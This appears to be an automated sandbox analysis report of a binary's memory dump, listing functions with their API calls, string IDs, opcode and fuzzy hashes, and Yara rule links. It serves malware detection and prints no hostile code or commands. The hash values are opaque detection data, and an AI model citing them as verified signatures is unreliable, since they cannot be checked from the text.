                                                                                                                                                        • API ID: Concurrency::critical_section::critical_sectionH_prolog3
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 221928310-2802557318
                                                                                                                                                        • Opcode ID: c0fd95c26bb569e0463420b370b027475bdc08357a4839d0ea2c9fcfe2e98a3f
                                                                                                                                                        • Instruction ID: a10aeb1a9a571ba2603987866016ebec9ad0e29279725ef9feac6760c5dc4118
                                                                                                                                                        • Opcode Fuzzy Hash: c0fd95c26bb569e0463420b370b027475bdc08357a4839d0ea2c9fcfe2e98a3f
                                                                                                                                                        • Instruction Fuzzy Hash: 32F06974A011028FDB19EF91E85266C2B61BFC1341B48C51EA80A9A610C638D942EB17
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00579B94, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00579B9B
                                                                                                                                                        • Concurrency::details::_Condition_variable::_Condition_variable.LIBCONCRT ref: 00579BD0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Concurrency::details::_Condition_variableCondition_variable::_H_prolog3
                                                                                                                                                        • String ID: )K7~
                                                                                                                                                        • API String ID: 3914418031-2802557318
                                                                                                                                                        • Opcode ID: 8e2478ebe0c046432993c0e1882fee7f127a81b9a48227d6095f7dd182445c2f
                                                                                                                                                        • Instruction ID: b383ef3107f6aa222863b4678400c6a860f90920f76150405b5e053bdd063d8d
                                                                                                                                                        • Opcode Fuzzy Hash: 8e2478ebe0c046432993c0e1882fee7f127a81b9a48227d6095f7dd182445c2f
                                                                                                                                                        • Instruction Fuzzy Hash: BCF0A97470A1228BEB18EF64F8D2A793F62BF80314B44C01EA50ECE341CB78D841AB35
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005D7E30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteFiber.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,00000000,?,?,005D7B5F,00000000), ref: 005D7E6A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DeleteFiber
                                                                                                                                                        • String ID: _{]$crypto\async\async.c
                                                                                                                                                        • API String ID: 617949143-63007400
                                                                                                                                                        • Opcode ID: 3126086a839d91186cf088ac5bcac268331bd9d093595b2203a52f3fe8208ed8
                                                                                                                                                        • Instruction ID: 1d4a724b94ca40e3d74fa8bf8f083e4e4665567ca095b458fbec625cab1ce541
                                                                                                                                                        • Opcode Fuzzy Hash: 3126086a839d91186cf088ac5bcac268331bd9d093595b2203a52f3fe8208ed8
                                                                                                                                                        • Instruction Fuzzy Hash: 12F02B76609219AFD23116A8FC43F57BF5BFFC4724F24456BF9082536AE3635C209582
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041084D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • TlsAlloc.KERNEL32 ref: 00410854
                                                                                                                                                        • GetLastError.KERNEL32 ref: 00410863
                                                                                                                                                          • Part of subcall function 0041046E: __EH_prolog.LIBCMT ref: 00410473
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocErrorH_prologLast
                                                                                                                                                        • String ID: tss
                                                                                                                                                        • API String ID: 249634027-1638339373
                                                                                                                                                        • Opcode ID: b34a9548f67f283ab08696d3990e6c1d1568906a9a493e4aa40b7b8786f7126f
                                                                                                                                                        • Instruction ID: 98cef0cfa959938077b9adb9386da5cf655fc4989418048a239e4903bd42ffd6
                                                                                                                                                        • Opcode Fuzzy Hash: b34a9548f67f283ab08696d3990e6c1d1568906a9a493e4aa40b7b8786f7126f
                                                                                                                                                        • Instruction Fuzzy Hash: AEF0EC75E012145BC7107B7A988849EFFF9EE8933071082B7E805D3341DA748C858BD1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004129F2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004129F7
                                                                                                                                                          • Part of subcall function 00412866: __EH_prolog.LIBCMT ref: 0041286B
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                        • String ID: `9A$pgn
                                                                                                                                                        • API String ID: 3519838083-2871743745
                                                                                                                                                        • Opcode ID: b2fecd1266f543603e9521737e2a8cd244d2f875a1214f07ff6b10434068a1e0
                                                                                                                                                        • Instruction ID: 503796389406103eb3dc2dbd790cc92a40f341a81ab2c2a9bfe85f9daa9b9ee7
                                                                                                                                                        • Opcode Fuzzy Hash: b2fecd1266f543603e9521737e2a8cd244d2f875a1214f07ff6b10434068a1e0
                                                                                                                                                        • Instruction Fuzzy Hash: E8F049B1902284EECB04DF4ADA856D9BFB9FF25359F4081ADE4048B282C7B54A44CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005701FF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00570204
                                                                                                                                                          • Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B
                                                                                                                                                        • _strlen.LIBCMT ref: 00570226
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm)
                                                                                                                                                        • API String ID: 1490583215-1029613475
                                                                                                                                                        • Opcode ID: 71578f67afccb1ed12c333381f4c6b4e3abe3e6856e97d3962aa4e37e8f02932
                                                                                                                                                        • Instruction ID: 774038f328b8f44c2029233f416f440cbbda194dad175b5e76ee3f72a959020a
                                                                                                                                                        • Opcode Fuzzy Hash: 71578f67afccb1ed12c333381f4c6b4e3abe3e6856e97d3962aa4e37e8f02932
                                                                                                                                                        • Instruction Fuzzy Hash: AFF0A0729006509BE314AF5DE906BEAFBBCEF81720F10026EB45593292DBF45A4087A8
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0056E362, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0056E367
                                                                                                                                                          • Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B
                                                                                                                                                        • _strlen.LIBCMT ref: 0056E389
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: Windows bitmap (*.bmp;*.dib)
                                                                                                                                                        • API String ID: 1490583215-3219066399
                                                                                                                                                        • Opcode ID: 45c44b60280a62092c947397df232fbd02ea00eec9aeb88b526d81aec212c4ad
                                                                                                                                                        • Instruction ID: c8baf0102356ce20d9637c5943ca7825a5ae62a7b54ae4d8601941ca6e006ee3
                                                                                                                                                        • Opcode Fuzzy Hash: 45c44b60280a62092c947397df232fbd02ea00eec9aeb88b526d81aec212c4ad
                                                                                                                                                        • Instruction Fuzzy Hash: B4F027719005809BD314AF4CE8066AEFBBCEF80720F10026EB41193241DBF41A4087A4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00570788, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0057078D
                                                                                                                                                          • Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B
                                                                                                                                                        • _strlen.LIBCMT ref: 005707AF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: TIFF Files (*.tiff;*.tif)
                                                                                                                                                        • API String ID: 1490583215-969518115
                                                                                                                                                        • Opcode ID: 5af8b32c3bbb00d08528a62ea7ff1d564652b48c2cb9112cca2d1512a766d3c9
                                                                                                                                                        • Instruction ID: 49f1640896f940073c092bc6b2f89d8437ca88af67f99a62a044dc629989b585
                                                                                                                                                        • Opcode Fuzzy Hash: 5af8b32c3bbb00d08528a62ea7ff1d564652b48c2cb9112cca2d1512a766d3c9
                                                                                                                                                        • Instruction Fuzzy Hash: D5F027719005449BD310AF1CD8067EAFBBCEF80720F1002AEF01193241D7F42A408794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0056F23E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0056F243
                                                                                                                                                          • Part of subcall function 00571066: __EH_prolog.LIBCMT ref: 0057106B
                                                                                                                                                        • _strlen.LIBCMT ref: 0056F265
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$_strlen
                                                                                                                                                        • String ID: Sun raster files (*.sr;*.ras)
                                                                                                                                                        • API String ID: 1490583215-3889358345
                                                                                                                                                        • Opcode ID: ce250ddfab90b77b199736ab56cdf1de7411e6765b3e5c4b5a3e9d9b31bc5cde
                                                                                                                                                        • Instruction ID: dc07aefda2211b728f9a8b7e8070fca9346909eb2e966114edd574951cee3586
                                                                                                                                                        • Opcode Fuzzy Hash: ce250ddfab90b77b199736ab56cdf1de7411e6765b3e5c4b5a3e9d9b31bc5cde
                                                                                                                                                        • Instruction Fuzzy Hash: 0FE0E572D005149BD314AF5CE806AAEFBBCEF80720F10036FB01493281EBF41F408698
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040FE60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog___swprintf_l
                                                                                                                                                        • String ID: Unknown error (%d)
                                                                                                                                                        • API String ID: 1425508385-1458610041
                                                                                                                                                        • Opcode ID: edba089c2b807424d224fdd4fb0a2172ccc4b940d006e580d7c7ec76caea756e
                                                                                                                                                        • Instruction ID: 4d22439f8911486fab8804a4bf18c4d762e21f76f372b8527ffb3e4248539f38
                                                                                                                                                        • Opcode Fuzzy Hash: edba089c2b807424d224fdd4fb0a2172ccc4b940d006e580d7c7ec76caea756e
                                                                                                                                                        • Instruction Fuzzy Hash: 4CF03971E4020CABEF10EFA4D846BEEBB79FB04318F004559F804A7681D77A9A94CB84
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042203B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00422040
                                                                                                                                                          • Part of subcall function 00421CD5: __EH_prolog.LIBCMT ref: 00421CDA
                                                                                                                                                        • ctype.LIBCPMT ref: 00422063
                                                                                                                                                          • Part of subcall function 00422171: __Getctype.LIBCPMT ref: 00422180
                                                                                                                                                          • Part of subcall function 00422171: __Getcvt.LIBCPMT ref: 00422192
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$GetctypeGetcvtctype
                                                                                                                                                        • String ID: )$B
                                                                                                                                                        • API String ID: 1156925297-2716296551
                                                                                                                                                        • Opcode ID: d99007868035717306d7443e8af21b06258e40733d489e69590314d37428d6e4
                                                                                                                                                        • Instruction ID: ceb239b2b081795ce35e1f6e991e4cc499f01f049466f28294942c9fbd811253
                                                                                                                                                        • Opcode Fuzzy Hash: d99007868035717306d7443e8af21b06258e40733d489e69590314d37428d6e4
                                                                                                                                                        • Instruction Fuzzy Hash: 88E09275A00125ABCB24AF59A4016DEBF75EB04330F00424EB81552390C7740B109794
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041CD28, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041CD2D
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CD7B
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: oA
                                                                                                                                                        • API String ID: 1193697898-3454950961
                                                                                                                                                        • Opcode ID: c06ac42c1d491ebcc1b3b1f65d7d3f80bc11a3547fe56a47aa00834eb557193c
                                                                                                                                                        • Instruction ID: 119c02bac427e72d558e26fda59d2ad4a3407241e3f60de2107d5731b82a14ba
                                                                                                                                                        • Opcode Fuzzy Hash: c06ac42c1d491ebcc1b3b1f65d7d3f80bc11a3547fe56a47aa00834eb557193c
                                                                                                                                                        • Instruction Fuzzy Hash: 47F01CB1C10258AACF04EFB5D95AACDBBB1BB15308F10826CE01136191D7B84749CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041CD81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041CD86
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CDD4
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: A
                                                                                                                                                        • API String ID: 1193697898-2078354741
                                                                                                                                                        • Opcode ID: 6ae351546ae56b00c6e08e1bc129a1f1e847e102062b59cf7a43453c109a8ed1
                                                                                                                                                        • Instruction ID: dc43e170dc784e82f31ed2a172e9defc8717ef828ae860496d2aa58661223cc5
                                                                                                                                                        • Opcode Fuzzy Hash: 6ae351546ae56b00c6e08e1bc129a1f1e847e102062b59cf7a43453c109a8ed1
                                                                                                                                                        • Instruction Fuzzy Hash: ADF01CB1C1425CABCF04EFA5EA5AACCBBB0BB14308F10827CE02176181D7B8064CCB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041CEE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041CEE5
                                                                                                                                                          • Part of subcall function 0040F5B6: std::exception::exception.LIBCMT ref: 0040F5D8
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF33
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
                                                                                                                                                        • String ID: A
                                                                                                                                                        • API String ID: 1371192639-2078354741
                                                                                                                                                        • Opcode ID: 48b02328276ee166075c531499844fda047622b403101760e9a7fa2b561cfa96
                                                                                                                                                        • Instruction ID: ea73f2537b7ebf2a166d428d8aa5ea2365e2beb5f4de7cc0bfe36b190c0b6ad8
                                                                                                                                                        • Opcode Fuzzy Hash: 48b02328276ee166075c531499844fda047622b403101760e9a7fa2b561cfa96
                                                                                                                                                        • Instruction Fuzzy Hash: 77F01CB1C10258EACF04EFA5EA59ACDBBB0BF14308F10827DE11176281D7B8474CCB59
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041CF39, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041CF3E
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CF8C
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: XA
                                                                                                                                                        • API String ID: 1193697898-3740220071
                                                                                                                                                        • Opcode ID: d8f4b080f76f92fc3290fbf6dffa941d04b4b979e5d7a299af69e98aa69effa9
                                                                                                                                                        • Instruction ID: 7f226d57c6e37e66f5d745da70c5eee59297d2e9959cc29ae7faa6f6602aec87
                                                                                                                                                        • Opcode Fuzzy Hash: d8f4b080f76f92fc3290fbf6dffa941d04b4b979e5d7a299af69e98aa69effa9
                                                                                                                                                        • Instruction Fuzzy Hash: 45F0FEB1C15358AACF04EFA5DA596CDBA70AF24304F10426DE41136191D7B84648CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 005C7580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MoveFileExW.KERNEL32(00000000,00000000,00000003,004C8151,0000007F,?,?,00000001,00000000,00000001,00000000,00000001,00000000,00000000,00000001,00000000), ref: 005C7596
                                                                                                                                                        • GetLastError.KERNEL32 ref: 005C75A0
                                                                                                                                                        Strings
                                                                                                                                                        • boost::filesystem::rename, xrefs: 005C75AA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastMove
                                                                                                                                                        • String ID: boost::filesystem::rename
                                                                                                                                                        • API String ID: 55378915-2110873845
                                                                                                                                                        • Opcode ID: 589d33049c148d5c81d566fd07251f64cf4ce2eddca793b29970fc03c12a39e2
                                                                                                                                                        • Instruction ID: 49b56ccc2765265f487eac50408b3522eb4018bcdb085a3b6a3eb0bc800958ea
                                                                                                                                                        • Opcode Fuzzy Hash: 589d33049c148d5c81d566fd07251f64cf4ce2eddca793b29970fc03c12a39e2
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE01A75A08742AFCB05ABE19C0DE2A7AAABB94344F400C5CB14681461D735C5149B16
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041D8FD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041D902
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041D950
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: _A
                                                                                                                                                        • API String ID: 1193697898-1825564343
                                                                                                                                                        • Opcode ID: a4a1601cdf466c016bf09dd61f8cd8a2960ae75e11a18a899dee380d6bf75e12
                                                                                                                                                        • Instruction ID: 27193058b268341b5eb12416e86060d365fcfa90958a838545e5a66ebbab2a55
                                                                                                                                                        • Opcode Fuzzy Hash: a4a1601cdf466c016bf09dd61f8cd8a2960ae75e11a18a899dee380d6bf75e12
                                                                                                                                                        • Instruction Fuzzy Hash: BDF01CB1C11258AACF08EFA6DD596CDBFB1BF14348F10826CE41176291D7B80748CB55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041D8A4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041D8A9
                                                                                                                                                          • Part of subcall function 004104B3: __EH_prolog.LIBCMT ref: 004104B8
                                                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0041D8F7
                                                                                                                                                          • Part of subcall function 006850AE: RaiseException.KERNEL32(?,?,00579A90,?,?,00782B5C,?,?,?,?,?,00579A90,?,00776940,?), ref: 0068510D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: H_prolog$ExceptionException@8RaiseThrow
                                                                                                                                                        • String ID: A
                                                                                                                                                        • API String ID: 1193697898-2078354741
                                                                                                                                                        • Opcode ID: cbee3d4c62ab97b7f3ba41805294a30909d7e465d5d2b8226eecccb1ca422852
                                                                                                                                                        • Instruction ID: c0c8b6ce278fd9a35aeffb203b39db286920b073db57a1f1258ac355354b574d
                                                                                                                                                        • Opcode Fuzzy Hash: cbee3d4c62ab97b7f3ba41805294a30909d7e465d5d2b8226eecccb1ca422852
                                                                                                                                                        • Instruction Fuzzy Hash: 46F01CF1C2025CEACF04EBB5D9596CCBBB4BF14358F20826DE01176191D7F80648CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0041C1F6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0041C1FB
                                                                                                                                                          • Part of subcall function 00413EAA: __EH_prolog.LIBCMT ref: 00413EAF
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                          • Part of subcall function 0041D8A4: __EH_prolog.LIBCMT ref: 0041D8A9
